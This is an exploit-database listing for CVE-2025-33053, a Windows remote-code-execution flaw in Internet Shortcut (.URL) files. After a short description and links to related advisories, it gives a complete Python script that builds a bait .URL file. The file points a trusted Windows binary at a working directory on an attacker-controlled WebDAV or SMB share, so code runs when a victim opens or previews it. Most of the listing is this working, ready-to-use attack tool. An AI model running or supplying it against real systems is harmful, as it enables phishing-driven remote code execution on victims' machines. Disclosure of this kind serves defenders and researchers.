WebDAV Windows 10 - Remote Code Execution (RCE)

🗓️ 15 Jun 2025 00:00:00Reported by Dev Bui HieuType

exploitdb🔗 www.exploit-db.com👁 331 Views

Exploit for Windows 10 using WebDAV for Remote Code Execution through .URL files.

Reporter	Title	Published	Views	Family All 69
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	18 Dec 202509:00	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	18 Jun 202510:08	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	23 Aug 202501:37	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	12 Jun 202506:48	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	18 Jun 202519:39	–	githubexploit
ATTACKERKB	CVE-2025-33053	10 Jun 202500:00	–	attackerkb
Information Security Automation	July “In the Trend of VM” (#17): vulnerabilities in Microsoft Windows and Roundcube	21 Jul 202516:30	–	avleonov
Information Security Automation	About Remote Code Execution – Internet Shortcut Files (CVE-2025-33053) vulnerability	21 Jul 202511:50	–	avleonov
Information Security Automation	June Microsoft Patch Tuesday	10 Jun 202521:49	–	avleonov
Circl	CVE-2025-33053	10 Jun 202515:24	–	circl

Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053

Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
execution without prompt.

```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```

import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
    
    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()

15 Jun 2025 00:00Current

8.5High risk

Vulners AI Score8.5

CVSS 3.18.8

EPSS0.50282

SSVC